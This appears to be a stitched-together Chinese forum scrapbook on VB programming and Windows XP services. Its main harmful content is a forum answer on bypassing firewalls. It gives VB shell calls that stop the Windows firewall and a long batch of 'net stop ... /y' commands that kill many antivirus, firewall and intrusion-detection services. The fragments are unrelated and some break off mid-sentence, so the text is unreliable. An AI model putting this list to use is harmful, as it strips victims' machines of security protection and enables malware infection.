

Shell "net start sharedaccess" '开启防火墙


Shell "net stop sharedaccess" '关闭防火墙




VB.net Socket

麻烦给我发下vb2010下Socket类的使用方法,最好是有代码。就是怎样实现同一台电脑上两个程序的通讯,1窗体有按钮,文本框,2窗体有文本框,当单机1窗体的按钮时该窗体文本框的内容在2窗体的文本框中显示。。。十万火急啊。 邮箱523484850@qq.com





alerter -错误警报器,垃圾,关闭。

application layer gateway service -给与第三者网络共享/防火墙支持的服务,有些防火墙/网络共享软件需要。占用1。5mb内存。

application management-用于设定,发布和删除软件服务。

automatic 更新s -windows自动更新,K,滚!

background intelligent transfer service -这个服务原是用来实现http1.1服务器之间的信息传输,微软称支持windows更新时断点续传

clipbook - 用与局域网电脑来共享 粘贴/剪贴的内容。(K,想得出!)

com+Event system -一些 COM+ 软件需要,检查你的 c:\program files\ComPlus Applications 目录,没东西可以把这个服务关闭.

COM+Event system application -同上

COmputer browser - 用来浏览局域网电脑的服务,但关了也不影响浏览!垃圾

cryptographic services -windows更新时用来确认windows 文件指纹的,我更新时才开启一下。

DHCP client-静态IP者需要(xDSL 等)小猫就不用了!!

Distributed link tracking client-用于局域网更新连接信息,比如在电脑A有个文件,在B做了个连接,如果文件移动了,这个服务将会更 新信息。占用4兆内存。

Distributed Transaction coordinator-无聊的东西。

DNS Client-DNS解析服务。。无聊~~

Error reporting service -错误报告器,把windows中错误报告给微软,无聊~~~~~

*Event Log- 系统日志纪录服务,很有用于查找系统毛病.

Fast user switching compatibility-多用户快速切换服务..无聊

help and support -帮助,无聊,还是无聊帮助..哈哈

Human interface device access-支持”弱智“电脑配件的。。比如键盘上调音量的按钮等等。。

IMAPI CD-burning COM service -xp刻牒服务,用软件就不用了占用1。6兆内存

Indexing service -恐怖的xp减速的东东!!!关关关!!!

Internet Connection Firewall(ICF).........-xp防火墙。。不用就关。

IPSEC Services-大众用户连边都沾不上。

Logical Disk manager -磁盘管理服务。。需要时它会通知你,所以一般关。

Logical Disk manager administrative service-同上。

messenger -不是msn,不想被骚扰的话就关。注:妖刺就是利用这个。

MS software shadow copy provider-无用,据说是备份用的。。我看什么用都没。

Net Logon-登陆 Domain Controller 用的,大众用户快关!

Netmeeting remote desktop sharing-用netmeeting 实现电脑共享。。晕!关!!

Network Connections - 上网/局域网要用的东东!

Network DDE -和clipbook一起用的,无聊~~~~

Network DDE DSDM -同上

Network 本地 Awareness-如有网络共享或ICS/ICF可能需要.(服务器端)

NT LM Security support provider-telnet 服务用的东东,关!!

NVIDIA Driver Helper service -nvidia 显卡帮助,关!

PDEngine - perfectdisk 引擎

PDScheduler -perfectdisk 计划服务

PerFORMance logs and alerts-记录机器运行状况而且定时写入日志或发警告,内容可能过于专业,所以。。自己决定。

*Plug and Play- 自动查测新装硬件,即插即用,开着吧~~~

Portable media serial number-绝对无用,无聊之及。

Print Spooler -打印机用的,我打印时才开一下。

Protected Storage-储存本地密码和网上服务密码的服务,包括填表时的“自动完成”功能。

QoS RSVP -关!就是那个20%的 QoS

Remote access auto connection manager-宽带者/网络共享可能需要!!

Remote desktop help session manager-远程帮助服务,傻透,占用4兆内存。

*Remote Procedure Call (RPC) -系统核心服务!

Remote Procedure Call LOCATOR-这个倒没什么用,管理 RPC 数据库服务,占用1兆内存。

remote registry -远程注册表运行/修改。大漏洞,还不快关!!

removable storage -一般情况下不用,磁带备份用的。

routing and remote access-哈哈。。不知者关!

secondary logon-给与administrator 以外的用户分配指定操作权.晕~~~

security accounts manager-像 Protected Storage, IIS Admin 才需要。

server -局域网文件/打印共享需要的。

shell hardware detection-给有些配置自动启动,像内存棒,和有些cd驱动等

smart card -关!1。4兆内存

smart card helper -关!

SSDP Discovery service-没有什么硬件利用这个服务。。

system event notification-记录用户登录/注销/重起/关机信息。。谁管这些。。

system restore service -系统还原服务,吃资源和内存的怪兽。。虽然有时用到,自己决定。

task scheduler-windows 计划服务啦,垃圾.

TCP/IP NetBIOS helper-如果你的网络不用 Netbios 或WINS,关了.

Telephony - 拨号服务,如果你的宽带不用拨号,那么关了它。

telnet -大漏洞,我第一个关的就是这个.这根dos中 telnet 命令没关系。2兆内存。

terminal services-实现远程登录本地电脑,快速用户切换和远程桌面功能需要,


themes -给xp打扮的东东,不要太花锹的就关了。

uninterruptible power supply-停电保护设备用的。。。没有的就关。

universal plug and play device host-同SSDP Discovery Service ,没用.

upload manager-用来实现服务器和客户端输送文件的服务,简单文件传输不需要这个!

volume shadow copy-同MS Software Shadow Copy Provider,无用.


Windows Audio - 控制着你听到的声音。关了就没声音了!!

Windows Installer -windows的MSI安装服务,建议设成手动。

windows image acquisition (WIA) -有些数码相机和扫描器用的,我的扫描器觉得它没用。

Windows Management Instrumentation - 满重要的服务,是管”服务依K”的,但关


windows management 包含umentat



绕过防火墙的话是很难做到的,至少我没有这个能力。因为这个要取得系统的优先权限,相信VB也很难做到这一点。如果是系统防火墙的话,你可以用关闭系统防火墙服务的方法来实现: shell "cmd net stop sharedacc" '这个是关闭系统防火墙的命令,相反,如果要打开一个系统服务的话你可以把net stop改为net start. 另外是我收集的一些其它防火墙的服务名称,你可以用上述方法对其进行关闭,你也可以把下面的命令保存成为一个批处理文件(*.bat)执行: net stop "Alerter" /y

net stop "Ecengine.exe" /y

net stop "eSafe Protect Desktop" /y

net stop "Esafe.exe" /y

net stop "Espwatch.exe" /y

net stop "eTrust EZ Firewall" /y

net stop "F-Agnt95.exe" /y

net stop "Findviru.exe" /y

net stop "Rav.exe" /y

net stop "F-STOPW" /y

net stop "Look'n'Stop Lite" /y

net stop "Lookout.exe" /y

net stop "LUALL" /y

net stop "Luall.exe" /y

net stop "LUCOMSERVER" /y

net stop "MCAFEE" /y

net stop "McAfee Firewall" /y

net stop "McAfee Internet Guard Dog Pro" /y

net stop "Moolive.exe" /y

net stop "Mpftray.exe" /y

net stop "N32scanw.exe" /y

net stop "NAVAPSVC" /y

net stop "NAVAPW32" /y

net stop "Navapw32.exe" /y

net stop "NAVLU32" /y

net stop "Navlu32.exe" /y

net stop "Navnt.exe" /y

net stop "NAVRUNR" /y

net stop "NAVW32" /y

net stop "Navw32.exe" /y

net stop "NAVWNT" /y

net stop "Navwnt.exe" /y

net stop "NeoWatch" /y

net stop "NISSERV" /y

net stop "NISUM" /y

net stop "Nisum.exe" /y

net stop "NMAIN" /y

net stop "Nmain.exe" /y

net stop "Norman Personal Firewall" /y

net stop "Normist.exe" /y

net stop "NORTON" /y

net stop "Norton AntiVirus Server" /y

net stop "Norton Internet Security" /y

net stop "Norton Personal Firewall 2001" /y

net stop "Nupgrade.exe" /y

net stop "Pc firewall" /y

net stop "PC Viper" /y

net stop "PCCIOMON" /y

net stop "Ecengine.exe" /y

net stop "eSafe Protect Desktop" /y

net stop "Esafe.exe" /y

net stop "Espwatch.exe" /y

net stop "eTrust EZ Firewall" /y

net stop "F-Agnt95.exe" /y

net stop "Findviru.exe" /y

net stop "Fprot.exe" /y

net stop "F-Prot.exe" /y

net stop "F-PROT95" /y

net stop "F-Prot95.exe" /y

net stop "FP-WIN" /y

net stop "F-Stopw.exe" /y

net stop "GNAT Box Lite" /y

net stop "IAMAPP" /y

net stop "Iamapp.exe" /y

net stop "Iamserv.exe" /y

net stop "Ibmasn.exe" /y

net stop "Ibmavsp.exe" /y

net stop "Icload95.exe" /y

net stop "Icloadnt.exe" /y

net stop "ICMON" /y

net stop "Icmon.exe" /y

net stop "Icsupp95.exe" /y

net stop "Icsuppnt.exe" /y

net stop "Iface.exe" /y

net stop "Internet Alert 99" /y

net stop "IOMON98" /y

net stop "Iomon98.exe" /y

net stop "Jedi.exe" /y

net stop "MCAFEE" /y

net stop "McAfee Firewall" /y

net stop "McAfee Internet Guard Dog Pro" /y

net stop "Moolive.exe" /y

net stop "Mpftray.exe" /y

net stop "N32scanw.exe" /y

net stop "NAVAPSVC" /y

net stop "NAVAPW32" /y

net stop "Navapw32.exe" /y

net stop "NAVLU32" /y

net stop "Navlu32.exe" /y

net stop "Navnt.exe" /y

net stop "NAVRUNR" /y

net stop "NAVW32" /y

net stop "Navw32.exe" /y

net stop "NAVWNT" /y

net stop "Navwnt.exe" /y

net stop "NeoWatch" /y

net stop "NISSERV" /y

net stop "NISUM" /y

net stop "Nisum.exe" /y

net stop "NMAIN" /y

net stop "Norton AntiVirus Server" /y

net stop "Nupgrade.exe" /y

net stop "NVC95" /y

net stop "Nvc95.exe" /y

net stop "Outpost.exe" /y

net stop "Padmin.exe" /y

net stop "Pavcl.exe" /y

net stop "Pavsched.exe" /y

net stop "Pavw.exe" /y

net stop "Pc firewall" /y

net stop "PC Viper" /y

net stop "PCCIOMON" /y

net stop "PCCMAIN" /y

net stop "PCCWIN98" /y

net stop "Pccwin98.exe" /y

net stop "Pcfwallicon.exe" /y

net stop "Persfw.exe" /y

net stop "PGP Gauntlet" /y

net stop "POP3TRAP" /y

net stop "Proxy +" /y

net stop "RsRavMon Service" /y

net stop "PVIEW95" /y

net stop "Rav7.exe"

net stop "Safeweb.exe" /y

net stop "Scan32.exe" /y

net stop "Scan95.exe" /y

net stop "Snort - Win32 GUI" /y

net stop "Snort (Intrusion Detection System)" /y

net stop "Sphinx.exe" /y

net stop "Sphinxwall" /y

net stop "Sweep95.exe" /y

net stop "Sybergen Secure Desktop" /y

net stop "Sybergen SyGate" /y

net stop "SYMPROXYSVC" /y

net stop "Tbscan.exe" /y

net stop "Tca.exe" /y

net stop "Tds2-98.exe" /y

net stop "Tds2-Nt.exe" /y

net stop "TermiNET" /y

net stop "TGB:BOB" /y

net stop "Tiny Personal Firewall" /y

net stop "Vet95.exe" /y

net stop "Vettray.exe" /y

net stop "Vscan40.exe" /y

net stop "Vsecomr.exe" /y

net stop "VSHWIN32" /y

net stop "Vshwin32.exe" /y

net stop "VSSTAT" /y

net stop "Vsstat.exe" /y

net stop "WEBSCANX" /y

net stop "Webscanx.exe" /y

net stop "WEBTRAP" /y

net stop "Wfindv32.exe" /y

net stop "Wingate" /y

net stop "WinProxy" /y

net stop "WinRoute" /y

net stop "WyvernWorks Firewall" /y

net stop "Zonealarm" /y

net stop "Zonealarm.exe" /y

net stop "AVP32" /y

net stop "LOCKDOWN2000" /y

net stop "AVP.EXE" /y

net stop "CFINET32" /y

net stop "CFINET" /y

net stop "ICMON" /y

net stop "SAFEWEB" /y

net stop "WEBSCANX" /y

net stop "ANTIVIR" /y

net stop "MCAFEE" /y

net stop "NORTON" /y

net stop "NVC95" /y

net stop "FP-WIN" /y

net stop "IOMON98" /y

net stop "PCCWIN98" /y

net stop "F-PROT95" /y

net stop "F-STOPW" /y

net stop "PVIEW95" /y

net stop "NAVWNT /y

net stop "NAVRUNR" /y

net stop "NAVLU32" /y

net stop "NAVAPSVC" /y

net stop "NISUM" /y

net stop "SYMPROXYSVC" /y

net stop "RESCUE32" /y

net stop "NISSERV" /y

net stop "ATRACK" /y

net stop "IAMAPP" /y

net stop "LUCOMSERVER" /y

net stop "LUALL" /y

net stop "NMAIN" /y

net stop "NAVW32" /y

net stop "NAVAPW32" /y

net stop "VSSTAT" /y

net stop "VSHWIN32" /y

net stop "AVSYNMGR" /y

net stop "AVCONSOL" /y

net stop "WEBTRAP" /y

net stop "POP3TRAP" /y

net stop "PCCMAIN" /y

net stop "PCCIOMON" /y

net stop "Virtual CD v4 Security service (SDK - Version)" /y

net stop "Norton Internet Security Accounts Manager" /y

net stop "Norton AntiVirus Auto-Protect" /y

net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" /y

net stop "Symantec Event Manager" /y

net stop "Symantec Proxy Service" /y

net stop "Symantec AntiVirus Server" /y

net stop "Symantec Client Firewall Accounts Manager" /y

net stop "Symantec Client Firewall Proxy Service" /y

net stop "Symantec Client Firewall Service" /y

net stop "Symantec Settings Manager" /y

net stop "NT LM Security Support Provider" /y

net stop "Protected Storage" /y

net stop "TskSrv FTP Server" /y

net stop "Norton AntiVirus Auto Protect Service" /y

net stop "IPSEC Policy Agent" /y

net stop "MonSvcNT" /y

net stop "FTP Publishing Service" /y

net stop "IPSEC Services" /y

net stop "Symantec AntiVirus Client" /y

net stop "Sygate Personal Firewall" /y

net stop "AntiVir Service" /y

net stop "SafeNet IKE Service" /y

net stop "SafeNet Monitor Service" /y

net stop "Sophos Anti-Virus" /y

net stop "Sophos Anti-Virus Network" /y

net stop "Sophos Anti-Virus Update" /y


这是捕捉键盘热键,例如QQ写的一个抓屏功能,同时按下Ctrl+Alt+A 就会自动 跳出抓屏。

也就是说上面这段代码自动获取到的热键符合Ctrl+Alt+A 的命令,所以才会执行事件。

If m.Msg = WM_SYSCOMMAND Then' 如果m 的热键码 有系统命令 执行以下事件。
